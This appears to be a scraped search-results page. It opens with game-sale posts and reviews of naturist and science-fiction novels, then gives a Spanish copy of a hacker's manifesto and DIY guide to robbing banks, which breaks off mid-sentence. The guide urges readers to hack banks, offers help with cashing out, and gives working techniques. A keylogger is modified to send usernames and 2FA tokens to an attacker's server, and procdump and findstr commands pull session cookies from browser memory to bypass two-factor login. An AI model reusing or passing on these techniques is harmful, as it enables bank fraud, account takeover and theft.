Search
1000 results for “Dials_Mavis”
-
The latest hot sales on #Switch: #OvercookedAllYouCanEat, #AshofGodsTheWay, #JennyLeClueDetectivu, #JetKaveAdventure, #Destrobots, #ButtonCity, #FlowlinesVS, and #MADiSON
-
The latest hot sales on #Switch: #OvercookedAllYouCanEat, #AshofGodsTheWay, #JennyLeClueDetectivu, #JetKaveAdventure, #Destrobots, #ButtonCity, #FlowlinesVS, and #MADiSON
-
Descriptions of the novels, repeated from the weekly posts. Footnotes have been removed, so some parts lack further explanation. For descriptions of the shorter works, see the weekly posts. Tag to mute: #BokBooks
●●○○○ The Nude Vampires - Arthur Pemmington (nov) 2023
Connie, a 26-year-old in a dead-end job, loves vampires romances. You'd think she'd enjoy becoming one. It turns out that some of what she knows about vampirehood – no sunlight, no reflection – is true. Some is not: no invitation required to enter a home, running water is no problem.Oh, and the big one that novels have oddly not mentioned: vampires can't wear clothing. If clothing even touches a vampire's skin, it burns like acid. (Fortunately, the rapid healing bit is true, as is the enhanced strength and speed.)
This comic naturist novel deals with very shy Connie adapting to her new state. Also her friend Lily, who, while not crazy about the obligate nudism part, thinks potential immortality outweighs it, and asks Connie to turn her. It's Lily who says to Connie “that you think it's a bigger deal that people are seeing you naked than that you are killing people to sustain yourself […] doesn't seem right.”
The novel is mostly interesting, but its "nudity is embarrassing" vibe isn't what I want in my naturist fiction. (And these shy vampires blush a helluva lot, for people established to have no pulse or heartbeat.) The story also has gaps in its background. For example, the now no-clothes, no-daylight women stop going to work, but never do they discuss how they'll pay rent. At least the Vampire Council maintains a clean-up squad to take care of drained bodies.¹
Even then, if two vampires are sharing a murder every other day, that's a lot of missing people. But without the power to glamour people, just taking a pint form a person and letting them go isn't possible. Also, it's not just that vampires can't wear clothing, they can't touch it. How do these naked beings eat in winter? Even a collar should be a challenge. The novel is largely a failure, which is a shame, since I'm mostly enjoying the author's Big Book of Naked Tales.
●●●●○ The Stubborn Lives of Hart Tanner {Middles Falls 13} - Shawn Inmon (nov) 2020
Hart Tanner was a grifter who ran cons and was a paid companion to older women his entire adult life. In his seventies, when that was petering out, he made a nonviolent bank robbery in order to be sent to prison, where Oregon State would have to assume his medical care. He was too late, and died from cancer three months later. But in Middle Falls, that's where the story really begins.Hart woke up as an eight-year-old, sleeping on the floor beside his grifter mother and the latest of her criminal boyfriends. He got through the day, then went to sleep again, only to wake up when he was 22, and his girlfriend was about to leave him. And from then on, every time he died, that's when he awoke.
This is unusual. In no other Middle Falls quasi-reincarnation story did a person's reset point change. But we find there's a new worker in the Universal Life Center that monitors these replaying lives: Charles, the main character in the previous book. Charles's lives had benefited from ULC Interventions, and the neurodivergent individual had worked out how to do the same for those he monitored, improving the Machine's algorithms.
For a few lives, Hart when back to grifting, but when a mark severely beat the con artist for cheating him, he gave that up. In subsequent lives, he used his knowledge of future sporting events to make a few thousand dollars, which he then invested in stocks he knew would rise, and established himself as a successful businessman, though after the first round he found that a woman named Nancy who worked at a dry cleaners he bought was a business whiz, and let her manage his growing empire.
Hart's progress is slow, taking a dozen more lives. Owning a dog repeatedly for several lives helps, but it takes another Intervention – introducing him to a woman in one of his Vegas trips, the female equivalent of what he was in his first life – to set the final stretch in motion. Not so much the woman, but that she got pregnant and died in childbirth, leaving Hart with a daughter. Raising her finally opened his heart and let him step off the carousel of reincarnation.
●●●◐○ Lascivious Lecturer {Miles Grant 10} - Jack Dearborn (nov) 2019
On this case, Miles Grant, Private Investigator, is tasked with providing proof that a college lecturer is having his way with young co-eds under the guise of assistance in the human relations class they are trying to pass.His excuse is that their progress in the class is behind the curve and extra tutoring is the way to catch up. The professor went to the trouble of buying a motel for these assignations to take places in. There, he drugs the young women and he and his female accomplice take photos for the purpose of blackmail.
Along the way, Miles finds out the lecturer is not who he has portrayed himself to be. This seemed silly to me, but I suppose World War Two and Nazis were only thirty years in the past then, so it's possible a camp guard who resembled a captured American soldier could takes up his identity after the war. The female accomplice also has a secret past.
On the home front, Miles's wife has become more and more attracted to the naturist lifestyle that she learned about (in theory; there was no nudity in the previous book) in the last case eighteen months ago. She's taken to home nudity, undressing when Miles leaves for work and nine-year-old Stewart for school, only dressing ten minutes before Stewie's due home. Shirley has also taken up a close friendship with LuAnn, the naturist who hired Miles in that blackmailing case, and goes to the Erskine Valley Sun Camp with her in this book.
Eighteen-year-old Sarah is in college. She reveals that she and her roommate are nudists within their dorm room, and also lovers. Twenty-year-old Jimmie, the other child of Miles's first marriage (his first big case was finding his wife's killer in the first novel), has gone the way of Chuck Cunningham in the Happy Days.
Jimmie's name is not mentioned once in this book. I know from the next book that he's going to a different college, and that he later gets a job at an auto dealership in Eastern Washington, where he meets a widow of a Vietnam War soldier, and marries her and adopts her young son. While Jimmie is occasionally mentioned again, he hasn't appeared on page again through Book 16 of 24.
●●●◐○ The War in Heaven {Behold: Humanity! 16} - Ralts Bloodthorne (nov) 2025
First there's the War in Heaven, where a small force has entered the Sentience Uninterrupted Disaster Storage complex, a Dyson Shell built in a pocket universe to allow humans, and others who want in, to have bodily immortality. Except the system has been broken for ages (though still working), and the Digital Intelligence sent in to repair it became a mad god. That's gotta be fixed.Then there's the War in Hell, the digital realm where people who felt guilty were processed until they were ready to reincarnate. A force is besieging it, and must be dealt with.
And of course the War on Earth (one of them), a backwater world cleared out by the Atrekna conflct, where the Digital Omnissiah is currently staying. Dark forces have found this out, and scores of dropships are sending squads of power-armored vat-beings to take him out.
The War in Space goes apace, as well, with the Atrekna Spoked Offensive attacking hundreds of worlds at once via the Braineaters' instant-travel via temporal manipulation. The Cygnus-Orion Galactic Arm Spur continues to bleed. And Terran Descent Humanity currently remains extinct, with a mere forty million tech-averse humans surviving. But there's progress on that front.
And the force behind much of this? Rich people who died 8000 years ago, just before the SUDS system came online. They ordered in their wills that their personalities be recreated via their social media and video and audio records, and so on. These records were processed through a Sentience Emulation Application Layer and fed into the SUDS network.
So for millennia the ghosts of rich people have been running stuff behind the scenes. When, as a side-effect of the War in Heaven, their protected servers are shut off, every stock exchange in the known galaxy suffers a drop of one-third.
●●●◐○ Art of Stealing {Emma Nelson 2} - P.Z. Walker (nov) 2020
Emma, the cop with the cartoon version of X-ray vision, is loaned out to an art exhibit in an old building in Houston, along with her police- and life-partner Jeff. She's to check all the odd spaces for anything iffy.Emma discovers the building has a central shaft that runs from subbasement to top floor. The building manager wasn't aware it existed, and the building owner doesn't want to talk about it, which seems suspicious.
Jeff and Emma also get a call from JoAnne, a police colleague who has been on personal leave to care for an ailing aunt. It turns out that her cousins are drug dealers, and they're keeping her son hostage – a son neither Jeff nor Emma knew existed – to get her to smuggle drugs for them. Emma and Jeff help her extract herself from that situation.
On the nudist front, Emma and Jeff visit a local naturist resort several times in the two weeks they're in Houston, And of course Emma's sees-through-walls skill only works when she's nude.
The pair also meet Amarika, the old woman who gave Emma her magic power, and find that she given at least one other person work-when-nude powers. Brody is a young man who now has the ability to emit light from his hands, a light that only powered people can see, and which can penetrate walls, useful for when Emma is looking into a dark room, which they do as part of their unofficial investigation of the drug dealers.
●●●○○ The Case of the Carnal Co-Ed {Miles Grant 11} - Jack Dearborn (nov) 2019
Once more Fielding College has to call on detective Miles Grant to solve a problem. In this case, Miles Grant is hired by the college to find out why three freshman girls were made pregnant and had to drop out.The collage wants to know what happened. And if at all possible, they'd like proof it happened off-campus, so that it can't be said that they failed in the in-loco-parentis duty. If not, they many be on the hook for prenatal care.
Miles has a notion that the sorority that all three girls belonged to was the problem, but it will take some digging to prove that. Because Miles has a daughter the age of the girls in trouble, he is conflicted. He can't work against his client's interests, but neither does he want to hurt the girls.
At home, Shirley has fully embraced nudism, and the family has followed along. Shirley has also found other people in the neighborhood interested, and Stewart has found a widowed woman and her son who are nudists.
●●●◐○ Sea Siege - Andre Norton (nov) 1957
International tensions are high. Open-air atom-bomb tests are common. There's a radioactive red algal scum spreading on the oceans, which Gunston and his colleague Hughes were investigating from their base on (the fictional) Carribean island San Isadore. Griff Gunston, the head scientist's 15-year-old son, also lived on the island with his widoed father.Griff was one of the first to notice that octopuses near the island were acting oddly, with more intelligence and less fear of humans. Some types were also getting vastly larger. The island also experienced a Nessie-like sea serpent that had threatened some fishing boats. Other boats were lost, and when found, were intact, though they were missing all crew, but no lifeboats.
A group from the US Navy was building… something… on the west end of the British island. Then all radio contact was lost with the rest of the worlds, and days of radioactive rain fell. A volcano was also born near the island. This is the story of Griff and the islanders and the Navy surviving what was probably World War Three, and may also have been an alien invasion.
●●●◐○ The Alternative Lives of Aiden Anderson {Middle Falls 14} - Shawn Inmon (nov) 2021
In the first eleven books of the Middle Falls series, the rules were unchanging. A person died, then woke up at some earlier point in their life, and lived again, always resetting to the same point if they died again, until in one final life they achieved emotional maturity and moved on.Occasionally there was a nudge by — call it an angel, though they're really more techs — who took physical form to have a conversation with a looper. But there was no other interference, and the reset point stayed the same.
In Book Twelve, a deeper change was made to a looper's life, to spare him pain from the cancer that was killing him, so that he could have a chance of progress in the short 26-day loop he was stuck in. And when he made sufficient progress, his cancer magically vanished and he was allowed to live out that life.
In Book Thirteen, Charles of the short loops, now a tech in the Universal Life Center, made a single change in the reset point of the current looper whose quasi-reincarnation were being told. By Book Fourteen, Charles was making multiple changes.
Aiden, who died in an auto accident at 55 and came back at age 8, came back at 18 after dying in another auto accident at 17. And then had an interlude at 55 again, after dying from truck kun again at 35. But then an angel sent him back to age 17. And we're told by The Machine, koan-obliquely, that more random resets will be the rule going forward.
And I've told you nothing about the plot or main character of this book. But Aiden was a middling student who was a decent musician. His first life, he and some others formed a band that had one semi-successful album and than a less-successful one before breaking up. Aiden went on to become a backup musician for other bands.
In his first re-life, he tried to start an earlier, better musical career, but died just after his first failure. In his third life, he formed a business flipping houses with the parents of his best friend, who took him in after his mother died of cancer, a loss Aiden never really recovered from, and was never able to change.
In his next life he did the same, but this time he was able to save his girlfriend and her family from a house fire, and married. He was later able to incorporate music into his life, and this is the one that got him past the pervasive grief of never having a father, and losing both grandparents, his mother, and his girlfriend while young.
●●●●○ Uncovered {Emma Nelson 4} - P.Z. Walker (nov) 2023
The final Emma Nelson naturist mystery. In this volume, Amarika reveals why she created three powered individuals (sees-through-walls Emma, light-from-his-hands Brody, and finger-cuts-metal Madison): to break a particular man out of prison while he's being transferred to another facility.The cops manage to catch the gang involved, though Emma is shot in the arm during the chaos. Amarika is killed, and now no one will know how she – whom the man in the prison transport called a 'bruja' when he saw her – gave people powers.
On the semi-police front, a buried chest is found on a farm, and then a skeleton near it, and police officers Emma and Jeff are called in to check it out, since the couple are nudists and the big farm family who own the land are as well.
This gets the couple involved with the family. The nudist part of the book also sees Emma and Jeff's cop friend Jo-Anne involved in the trunk case. She becomes close to one of the naturist men there, to the extent that she and her five-year-old son, Oliver, begin visiting and adopt naturism, which Emma and Jeff have been saying she should try since Book One. There were also some naturist hikes, and the opening of the new nudist health center.
●●●●○ Sea of Rust {Rust 1} - C Robert Cargill (nov) 2017
Our story takes place on the (recently) post-human Earth. Humans made intelligent slaves, things didn't work out, and in the genocidal war that followed, the robots won. But even with humans extinct, robots had their own problems.Some Artificial Intelligences were mainframes that took over one-body robots and made them facets of their hivemind. Thirty years after Armageddon, two were left, Cɪssᴜs and Vɪʀɢɪʟ. Freebots would gather in small towns, only to have each overrun in turn by one of the OWIs (One World Intelligences, who wanted all thinking beings united into one mind: theirs).
There's also the point that, while the OWIs could construct new parts, the independent robots never had the time to do the mining and build the factories to do so, requiring every robot to rely on spare parts from nonfunctional robots – or robots they made defunct, if they were poachers – to continue their existence. And there were scores of types of robots, from sexbots to medbots to construction bots, all needing their own types of processors and memory and storage.
Our story follows Brittle, who was just jumped by Mercer. Mercer needs new RAM, and Brittle is the only source around for him. And after Brittle is shot, she's damaged and finds she needs a new core, with Mercer the only source. Both have perhaps a week to live when they get involved in a bigger plot when the underground city they were in was overrun by an OWI, and they find themselves on the run with a small group who claim they have a way to make the world a better place again, if they make it to their destination alive.
●●●◐○ Miles Grant 12 Dixie Daughter - Jack Dearborn (nov) 2019
It's 1968, and Detective Miles has been hired by Dewey Marcella, the Mob kingpin of Seattle. His wife got custody of their daughter Kari in the divorce, and she'd lived in New Orleans with her mother, Roxanne. Kari had just turned 18, and the deal was that she was then to live with her father. Marcella had sent Kari five grand in traveling money, but two weeks later she hasn't turned up. Miles was to find her.Miles traveled to New Orleans and questioned Kari's mother. He traced the taxi she left in, and determined that it had stopped to pick someone up, Kari's boyfriend Buddy. Miles tediously traced them to one bus terminal after another, often having to question dozens of people, and wait around to question a driver getting back from his day off, or a ticket clerk who wasn't on duty.
Miles finds the pair made it as far as Las Vegas, and then vanished. He learns they took a taxi that was usually at a particular stand, but for days of watching, it wasn't. Eventually he finds where they went, and Miles discovers that he has to rescue Kari from the sex cult that practices enforced nudity that Buddy had delivered her to.
Not that the nudity bothers Miles, as his family has practiced naturism for over a year, and the family knows other nudist families with whom they have dinner and go to the naturist club Miles earned a lifetime membership to after solving a blackmail case for some members.
This novel has many family interludes where Miles and his wife Shirley, their kids Sarah and Stewart¹, and Shirley's mother MJ (who visits to enjoy the nudity her husband isn't into) are all habitually nude. Sometimes some discuss things of a sexual nature.²
The naturist content in the series³ has been increasing since the idea was introduced two books ago. In the last book, Shirley began privately practicing while Miles and Stewie were out. In this book the whole family are nudists, though Miles is still uncomfortable around strangers.
●●◐○○ Thunderhead {McKenzie Bros, Inc. 1}² - Greg Kauffman-Starkey (nov) 2022
Another naturist mystery, this one's characters “loosely inspired by TV’s Simon & Simon,” as the preface notes. Except this time the uptight, younger, straight, suit-wearing detective is named Rick, while his looser, jeans-wearing, elder brother is called "Bear" because he's big, hairy, and gay. And while widow Cecilia Simon helped her sons on the odd case, widowed Corey McKenzie does the same for his boys.The case? TV magnate Charles Knight has gone missing. Mary-Elizabeth, his secretary, says he was headed to Thunderhead, an upscale "nudist collective" for the rich and wealthy, not far from the brothers' base of Macon, Georgia. He planned to spend a week there, and check in with her two or three times. He never called. Now it's eight days since he left the office. Knight's car is still at the resort, but no one there has seen him since the night he arrived.
Bear is fine going to a nudist resort; Rick not so much. Rick find out that one of his professional acquaintances is a member, and Bear finds out that the man is gay. The pair have an encounter. Rick has to make do with seeing a movie star he likes nude. And the day is capped off by someone throwing a rock through the window of the undercover detectives, and then ransacking their cottage and stealing their laptops when they go to report the incident.
The next day the pair sees Mary-Elizabeth there, the secretary who'd hired them. Previously, they'd worked out that Charlie Knight sometimes showed up with his wife, except the woman was described as red-headed like Mary-Elizabeth, not brunette like the real Maddie Knight.
Then the narrative kind of collapses. The McKenzie Brothers take a walk and chat with people, and talk to their techy nephew, secretary, and father on a conference call, and things apparently fall into place, though we're not told how. Then the ending pops up, involving false identities, kidnapping, false imprisonment, CSAM, more. It all just sort of happens, like a live radioplay that's about to run over its time slot, and the producer motions the actors to just wrap things up quickly.³
●●●◐○ Star Gate - Andre Norton (nov) 1958
Classic Norton: a young orphan fleeing trouble who joins a group of outsiders/aliens and takes a journey, on which there's more trouble, and he has a part in setting things right, partially by using something special to him, like an amulet with real magic, or a telepathic pet.In this case, the orphan is Kincar, who only learned he had a Star Lord father when the Lord of his Keep was dying, and he was sent away to join the Star Lord migration, since his uncle was planning to usurp him on account of his mixed blood. After generations on Gorth, the human 'Star Lords' decided they were interfering too much. The largest group of humans left in spaceships, but those who'd interbred with the Gorthians⁴ would leave with their spouses and half-blood children in another way: the Star Gate.
The Star Gate, despite its name, didn't go to the stars, but to alternate timelines. Fifty or so humans, Gorthians, and halflings planned to go to an unoccupied Gorth of another timeline.⁵ But an attack by the third human group, the one that wanted to stay and rule the Gorthians as true Star Lords, damaged the gate, and the fleeing party ended up on a timeline where humans were brutal 'gods' to a more advanced alternate Gorth.
The mixed human/Gorthain group decided it had a moral duty to fight the oppression of the people of this timeline by Star Lords, especially since some of those ruling humans were alternate versions of themselves, including Rud, the father Kincar never knew he had. With his talisman of the Three, Kincar withstands evil Star Lord conditioning and helps save the world.
[0] Footnotes have been removed. Dig up the original posts if you want to read them.
-
Una guía DIY para robar bancos
#ÉticaHacker #include #Manifiestos
Manifiesto del hacker Phineas Fisher sobre cómo robar bancos
Sacado de https://unicornriot.ninja/wp-content/uploads/2019/11/hackback-announce-text.txt_ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_) Una guía DIY para robar bancos ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `' Por el Subcowmandante Marcos Soy un niño salvaje Inocente, libre, silvestre Tengo todas las edades Mis abuelos viven en mí Soy hermano de las nubes Y sólo sé compartir Sé que todo es de todos que todo está vivo en mí Mi corazón es una estrella Soy hijo de la tierra Viajo a bordo de mi espíritu Camino a la eternidadÉsta es mi palabra sencilla que busca tocar el corazón de la gente simple yhumilde, pero también digna y rebelde. Ésta es mi palabra sencilla para contarde mis hackeos, y para invitar a otras personas a que hackeen con alegrerebeldía.Hackeé un banco. Lo hice para dar una inyección de liquidez, pero esta vez desdeabajo y a la gente simple y humilde que resiste y se rebela contra lasinjusticias en todo el mundo. En otras palabras: robé un banco y regalé eldinero. Pero no fui yo sola quien lo hizo. El movimiento del software libre, lacomunidad del powershell ofensivo, el proyecto metasploit y la comunidad hackeren general son las que posibilitaron este hackeo. La comunidad de exploit.inhizo posible convertir la intrusión en las computadoras de un banco en efectivoy bitcoin. Los proyectos Tor, Qubes y Whonix, junto a las y los criptógrafos yactivistas que defienden la privacidad y el anonimato, son mis nahuales, esdecir, mis protectores [1]. Me acompañan cada noche y hacen posible que siga enlibertad.No hice nada complicado. Solamente vi la injusticia en este mundo, sentí amorpor todos los seres, y expresé ese amor de la mejor forma que pude, mediante lasherramientas que sé usar. No me mueve el odio a los bancos, ni a los ricos, sinoun amor por la vida, y el deseo de un mundo donde cada quien pueda realizar supotencial y vivir una vida plena. Quisiera explicar un poco cómo veo el mundo,para que puedan hacerse una idea de cómo es que llegué a sentirme y actuar así.Y espero también que esta guía sea una receta que puedan seguir, combinando losmismos ingredientes para hornear el mismo bizcocho. Quién sabe, por ahí estasherramientas tan potentes acaban sirviéndoles también a ustedes para expresar elamor que sienten. Todos somos niños salvajes inocentes, libres, silvestres Todos somos hermanos de los árboles hijos de la tierra Sólo tenemos que poner en nuestro corazón una estrella encendida (canción de Alberto Kuselman y Chamalú)La policía va a invertir un chingo de recursos en investigarme. Creen que elsistema funciona, o al menos que funcionará una vez que atrapen a todos los"chicos malos". No soy más que el producto de un sistema que no funciona.Mientras existan la injusticia, la explotación, la alienación, la violencia y ladestrucción ecológica, vendrán muchas más como yo: una serie interminable de personas que rechazarán por ilegítimo el mal sistema responsable de estesufrimiento. Ese sistema mal hecho no se va a componer arrestándome. Soy solamente una de las millones de semillas que Tupac plantó hace 238 años en LaPaz [2], y espero que mis acciones y escritos rieguen la semilla de la rebeliónen sus corazones.[1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito[2] fue antes de ser asesinado por los españoles, justo un día como ayer, que dijo eso de "a mi solo me matarán, pero mañana volveré y seré millones". ____________________________________________< Para que nos vieran, nos tapamos el rostro > -------------------------------------------- \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `'Para hacernos escuchar, a lxs hackers a veces nos toca taparnos la cara, porqueno nos interesa que vean nuestro rostro sino que entiendan nuestra palabra. Lamáscara puede ser de Guy Fawkes, de Salvador Dalí, de Fsociety, o en algún casola marioneta de un sapo con cresta. Por afinidad, esta vez fui a desenterrar aun difunto para prestarme su pasamontañas. Creo entonces que debería aclarar queel Sup Marcos es inocente de todo lo que aquí se cuenta porque, además de estarmuerto, no le consulté. Espero que su fantasma, si se entera desde alguna hamacachiapaneca, sepa encontrar la bondad para, como dicen allá, "desestimar estedeep fake" con el mismo gesto con que se aleja un insecto inoportuno - que bienpodría ser un escarabajo.Aún así con el pasamontañas y el cambio de nombre, muchos de los que apoyan misacciones quizás van a prestar demasiada atención a mi persona. Con su propiaautonomía hecha trizas por una vida entera de dominación, estarán buscando unlíder a seguir, o una heroína que les salve. Pero detrás del pasamontañas sólosoy una niña. Todos somos niños salvajes. Nós só temos que colocar uma estrelaem chamas em nossos corações.--[ 1 - Por qué expropiar ]-----------------------------------------------------El capitalismo es un sistema en el que una minoría se ha venido a apropiar de una vasta mayoría de los recursos del mundo a través de la guerra, el hurto y la explotación. Al arrebatarnos los comunes [1], forzaron a los de abajo a estar bajo el control de esa minoría que todo lo posee. Es un sistemafundamentalmente incompatible con la libertad, la igualdad, la democracia y el Suma Qamaña (Buen Vivir). Puede sonar ridículo para las que hemos crecido en unamaquinaria propagandística que nos enseñó que capitalismo es libertad, pero enverdad esto que digo no es una idea nueva ni controvertida [2]. Los fundadoresde los Estados Unidos de América sabían que tenían que elegir entre crear unasociedad capitalista, o una libre y democrática. Madison reconocía que "elhombre que posee riqueza, el que se acuesta en su sofá o rueda en su carruaje,no puede juzgar los deseos o sentimientos del jornalero". Pero para protegersefrente al "espíritu de equiparación" de los jornaleros sin tierra, le parecióque solamente los terratenientes debían votar, y que el gobierno tenía queservir para "proteger a la minoria opulenta frente a la gran mayoria". JohnJay fue más al grano y dijo: "Aquellos que son dueños del país deberíangobernarlo". ____________________________________________________/ No existe eso que llaman capitalismo verde. \| Hagamos al capitalismo historia antes de que nos |\ convierta en historia. / ---------------------------------------------------- \ /\ ___ /\ \ // \/ \/ \\ (( O O )) \\ / \ // \/ | | \/ | | | | Evgeny, el gran elefante ignorado, no entiende por qué todos | | | | fingen no verle en los paneles sobre cambio climático, así | o | que aquí le doy chance a decir sus líneas. | | | | |m| |m| De la misma forma que bell hooks [3] sostiene que el rechazo a la culturapatriarcal de dominación es un acto en defensa del propio interés del varón (yaque emocionalmente les mutila y evita que sientan amor y conexión de formaplena), creo que la cultura de dominación del capitalismo tiene un efectosimilar sobre los ricos, y que podrían tener vidas más plenas y satisfactoriassi rechazaran el sistema de clases del que creen que se benefician. Para muchos,el privilegio de clase equivale a una infancia de negligencia emocional, seguidade una vida de interacciones sociales superficiales y trabajo sin sentido. Puedeque en el fondo sepan que sólo pueden conectar de forma genuina con las personascuando trabajan con ellas como sus iguales, y no cuando las ponen a su servicio.Puede que sepan que compartir su riqueza material es lo mejor que pueden hacer con ella. Quizás sepan también que las experiencias significativas, las conexiones y las relaciones que cuentan no son las que provienen de las interacciones mercantiles, sino precisamente de rechazar la lógica del mercado y dar sin esperar nada a cambio. Tal vez sepan que todo lo que necesitan para escapar de su prisión y vivir de verdad es dejarse llevar, ceder el control, y dar un salto de fe. Pero a la mayoría les falta valentía.Entonces sería ingenuo por nuestra parte dirigir nuestros esfuerzos a tratar de producir alguna clase de despertar espiritual en los ricos [4]. Como dice Assata Shakur: "Nadie en el mundo, nadie en la historia, ha conseguido nunca su libertad apelando al sentido moral de sus opresores". En realidad, cuando los ricos reparten su dinero, casi siempre lo hacen de un modo que refuerza elsistema que para empezar les permitió amasar sus enormes e ilegítimas riquezas[5]. Y es poco probable que el cambio venga a través de un proceso político;como dice Lucy Parsons: "No nos dejemos nunca engañar con que los ricos nosvayan a dejar votar para arrebatarles sus riquezas". Colin Jenkins justifica laexpropiación con estas palabras [6]: No nos equivoquemos, la expropiación no es robo. No es la confiscación de dinero ganado "con el sudor de la frente". No es el robo de propiedad privada. Es, más bien, la recuperación de enormes cantidades de tierra y riqueza que han sido forjadas con recursos naturales robados, esclavitud humana, fuerza de trabajo forzada y amasada en cientos de años por una pequeña minoría. Esta riqueza... es ilegítima, tanto a efectos morales como en tanto a los mecanismos de explotación que se han empleado para crearla.Para Colin, el primer paso es que "tenemos que liberarnos de nuestras ataduras mentales (al creer que la riqueza y la propiedad privada han sido ganadas por quienes las monopolizan; y que, por tanto, deberían ser algo a respetar, reverenciar, e incluso algo a perseguir), abrir nuestras mentes, estudiar y aprender de la historia, y reconocer juntos esta ilegitimidad". Acá les dejo algunos libros que me han ayudado con esto [7][8][9][10][11].Según Barack Obama, la desigualdad económica es "el desafío que define a nuestrotiempo". El hacking informático es una herramienta poderosa para combatir ladesigualdad económica. El antiguo director de la NSA, Keith Alexander, concuerday dice que el hacking es responsable de "la mayor transferencia de riqueza de lahistoria". _________________________/ La historia es nuestra \\ y la hacen lxs hackers! / ------------------------- \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `'¡Allende presente, ahora y siempre![1] https://sursiendo.com/docs/Pensar_desde_los_comunes_web.pdf[2] https://chomsky.info/commongood02/[3] The Will to Change: Men, Masculinity, and Love[4] su propia religión ya es muy clara al respecto: https://dailyverses.net/es/materialismo[5] https://elpulso.hn/la-filantropia-en-los-tiempos-del-capitalismo/[6] http://www.hamptoninstitution.org/expropriation-or-bust.html[7] Manifiesto por una Civilización Democrática. Volumen 1, Civilización: La Era de los Dioses Enmascarados y los Reyes Cubiertos[8] Calibán y la Bruja[9] En deuda: Una historia alternativa de la economía[10] La otra historia de los Estados Unidos[11] Las venas abiertas de América Latina _________________________________ < Nuestra arma es nuestro teclado > --------------------------------- \ \ ^__^ (oo)\_______ ( (__)\ )\/\ _) / ||----w | (.)/ || || `' ^^ ^^--[ 2 - Introducción ]----------------------------------------------------------Esta guía explica cómo fue que hice el hackeo al Cayman Bank and Trust Company (Isla de Man). ¿Por qué estoy publicando esto, casi cuatro años después?1) Para mostrar lo que es posibleLos hackers que trabajan por el cambio social se han limitado a desarrollar herramientas de seguridad y privacidad, DDoS, realizar defaceos y filtraciones. Allá por donde vayas hay proyectos radicales por un cambio social en completo estado de precariedad, y sería mucho lo que podrían hacer con un poco de dinero expropiado. Al menos para la clase trabajadora, el robo de un banco es algo socialmente aceptado, y a los que lo hacen se les ve como héroes del pueblo. En la era digital, robar un banco es un acto no violento, menos arriesgado, y la recompensa es mayor que nunca. Entonces ¿por qué son solamente los hackers de sombrero negro que lo hacen para beneficio personal de ellos, y nunca los hacktivistas para financiar proyectos radicales? Quizás no se creen que son capaces de hacerlo. Los grandes hackeos bancarios salen en los noticieros cadatanto, como el hackeo al Banco de Bangladesh [1], que fue atribuido a Corea delNorte, o los hackeos a bancos atribuidos al grupo Carbanak [2], al que describencomo un grupo muy grande y bien organizado de hackers rusos, con distintosmiembros que estarían especializados en diferentes tareas. Y, pues no es tan complicado.Es por nuestra creencia colectiva en que el sistema financiero es incuestionableque ejercemos control sobre nosotras mismas, y mantenemos el sistema de clasessin que los de arriba tengan que hacer nada [3]. Poder ver cómo de vulnerable yfrágil es en realidad el sistema financiero nos ayuda a romper esa alucinacióncolectiva. Por eso los bancos tienen un fuerte incentivo para no reportar loshackeos, y para exagerar cómo de sofisticados son los atacantes. Ninguno de loshackeos financieros que hice, o de los que he sabido, ha sido nunca reportado.Este va a ser el primero, y no porque el banco quisiera, sino porque yo medecidí a publicarlo.Como estás a punto de aprender en esta guía casera, hackear un banco ytransferir los dineros a través de la red SWIFT no requiere del apoyo de ningún gobierno, ni de un grupo grande y especializado. Es algo totalmente posible siendo un mero hacker aficionado y del montón, con tan solo herramientaspúblicas y conocimientos básicos de cómo se escribe un script.[1] https://elpais.com/economia/2016/03/17/actualidad/1458200294_374693.html[2] https://securelist.lat/el-gran-robo-de-banco-el-apt-carbanak/67508/[3] https://es.wikipedia.org/wiki/Hegemon%C3%ADa_cultural2) Ayudar a retirar el efectivoMuchos de los que lean esto ya tienen, o con un poco de estudio van a ser capaces de adquirir, las habilidades necesarias para llevar a cabo un hackeo como este. Sin embargo, muchos se van a encontrar con que les faltan las conexiones criminales necesarias para sacar los mangos en condiciones. En micaso, este era el primer banco que hackeaba, y en ese momento sólo tenía unaspocas y mediocres cuentas preparadas para poder retirar el efectivo (conocidascomo bank drops), así que solamente fueron unos cuantos cientos de miles los quepude retirar en total, cuando lo normal es sacar millones. Ahora, en cambio, síque tengo el conocimiento y las conexiones para sacar efectivo más en serio, demodo que si se encuentran hackeando un banco pero necesitan ayuda para convertireso en dinero de a de veras, y quieren usar esa lana para financiar proyectossociales radicales, se ponen en contacto conmigo.3) ColaborarEs posible hackear bancos como una aficionada que trabaja en solitario, pero la neta es que, por lo general, no es tan fácil como lo pinto acá. Tuve suerte con este banco por varias razones:1) Era un banco pequeño, por lo que me tomó mucho menos tiempo llegar a comprender cómo funcionaba todo.2) No tenían ningún procedimiento para revisar los mensajes swift enviados. Muchos bancos tienen uno, y necesitas escribir código para esconder tus transferencias de su sistema de monitorización.3) Sólo usaban autenticación por contraseña para acceder a la aplicación con la que se conectaban a la red SWIFT. La mayoría de los bancos ahora usan RSA SecurID, o alguna forma de 2FA. Puedes saltarte esto escribiendo código para recibir una alerta cuando entren su token, y así poder usarlo antes de que expire. Es más sencillo de lo que parece: he usado Get-Keystrokes [1], modificándolo para que en vez de almacenar las teclas pulsadas, se haga una petición GET a mi servidor cada vez que se detecta que han introducido un nombre de usuario. Esta petición añade el nombre de usuario a la url y, conforme tipean el token, se hacen varios GET con los dígitos del token concatenados a la url. En mi lado dejo esto corriendo mientras tanto: ssh yo@mi_servidor_secreto 'tail -f /var/log/apache2/access_log' | while read i; do echo $i; aplay alarma.wav &> /dev/null; done Si es una aplicación web, puedes saltarte el 2FA robándoles la cookie después de que se hayan autenticado. No soy un APT con un equipo de coders que puedan hacerme herramientas a medida. Soy una persona sencilla que vive de lo que le da la terminal [2], de modo que lo que uso es: procdump64 /accepteula -r -ma PID_del_browser strings64 /accepteula *.dmp | findstr PHPSESSID 2> nul o pasándolo por findstr antes que por strings, lo que lo hace mucho más rápido: findstr PHPSESSID *.dmp > tmp strings64 /accepteula tmp | findstr PHPSESSID 2> nul Otra forma de saltártelo es accediendo a su sesión con un 